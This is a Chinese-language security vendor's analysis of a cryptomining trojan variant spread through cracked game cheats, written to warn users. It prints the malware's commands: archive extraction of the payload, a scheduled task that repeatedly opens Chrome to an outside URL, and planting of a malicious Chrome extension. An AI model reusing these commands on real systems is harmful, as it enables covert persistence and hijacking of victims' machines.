一:木馬概述
360安全中心近期監控到WinstarNssmMiner3變種非常活躍,日攔截量超過三萬,該木馬主要是通過各種破解外掛傳播,建議用戶下載各種軟件時候儘量到官方網站下載,不要輕易下載各種來歷不明軟件。
二:木馬分析
新的木馬變種不再使用MSI打包,而使用Inno打包,並將unzip.exe文件改名成q.exe來偽裝自己。
安裝包釋放文件後調用q.exe -o -P pwzx aa.zip命令來解壓出木馬。
解壓縮出來的Uninstall.dll文件是木馬DLL的Loader程序,_locale.nls是加密後的核心木馬程序,Loader會對其進行解密並內存加載執行。
內存解密_locale.nls出PE並加載:
內存加載解密後的木馬進行挖礦,新的木馬變種還使用了VMP進行代碼保護:
然後跟之前版本類似木馬為了常駐於用戶電腦會添加一個計劃任務:
/create /tn "{0621BB95-A70B-9841-162F-62C578D8E38F}" /tr "'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' http://mod-blog.com/cl/?guid=blo7phv3xl7etbeqpt8xv1yofjgnrxds&prid=1&pid=6_1308_5758" /sc minute /mo 40 /f
然後還會添加Chrome惡意插件
%UserProfile%\AppData\Local\Temp\85C2E101\DBBKGILOKAOHNHHEANPIBGKLMHMKNHMM""%UserProfile%\AppData\Local\Google\Chrome\User Data\Default\Extensions\dbbkgilokaohnhheanpibgklmhmknhmm" /e /i /h /c /r /y
該插件信息為:
注入svchost.exe進程 中挖礦,svchost.exe CPU佔用極高
木馬安裝包VT檢出情況:
三:安全提醒
近期挖礦木馬非常活躍,讓人防不勝防。建議用戶及時打上系統和第三方補丁,發現電腦卡慢等異常情況時候使用安全軟件掃描,同時注意保證安全軟件的常開以進行防禦一旦受誘導而不慎中招,儘快使用360安全衛士查殺清除木馬
此外,360安全衛士已經推出了挖礦木馬防護功能,
全面防禦從各種渠道入侵的挖礦木馬。用戶開啟了該功能後,360安全衛士將會實時攔截各類挖礦木馬的攻擊,為用戶計算機安全保駕護航。
下載地址:
http://down.360safe.com/inst.exe
閱讀更多 360安全衛士 的文章
